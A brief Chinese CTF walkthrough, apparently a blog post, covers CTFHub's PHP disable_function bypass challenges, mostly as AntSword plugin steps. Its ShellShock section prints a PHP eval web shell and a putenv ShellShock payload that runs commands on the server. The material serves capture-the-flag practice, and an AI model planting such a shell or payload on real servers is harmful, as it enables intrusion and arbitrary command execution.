ctfhub Bypass disable_function

LD_PRELOAD

url

蚁剑连接

选择插件

点击开始

查看到此文件名编辑连接拼接到url后面重新连接

点击开启终端

在终端执行命令

复制代码
ls /
/readfile

ShellShock

url

CTFHub 环境实例 | 提示信息

蚁剑连接

写入shell.php

复制代码
<?php
  @eval($_REQUEST['ant']);
  putenv("PHP_test=() { :; }; tac /flag >> /var/www/html/test.php");
  error_log("admin",1);
  //mail("admin@localhost","","","","");
?>

使用插件

终端执行命令得到flag

Apache Mod CGI

查看GetFlag

蚁剑连接

直接使用工具

终端执行命令

PHP-FPM

蚁剑连接

工具连接

拼接地址

在终端执行命令

GC UAF

蚁剑连接

使用工具

在终端执行命令

相关推荐
小馬佩德罗1 小时前
Android 系统的兼容性测试 - CTS
android·cts
缘来的精彩2 小时前
Android ARouter的详细使用指南
android·java·arouter
风起云涌~2 小时前
【Android】ListView控件在进入|退出小窗下的异常
android
syy敬礼2 小时前
Android菜单栏
android
大风起兮云飞扬丶2 小时前
Android——RecyclerView
android
dongpingwang2 小时前
android10 卸载应用出现回退栈异常问题
android
_一条咸鱼_2 小时前
深度剖析:Android SurfaceView 使用原理大揭秘
android·面试·android jetpack
_一条咸鱼_10 小时前
深度揭秘!Android HorizontalScrollView 使用原理全解析
android·面试·android jetpack
_一条咸鱼_10 小时前
揭秘 Android RippleDrawable:深入解析使用原理
android·面试·android jetpack
_一条咸鱼_10 小时前
深入剖析:Android Snackbar 使用原理的源码级探秘
android·面试·android jetpack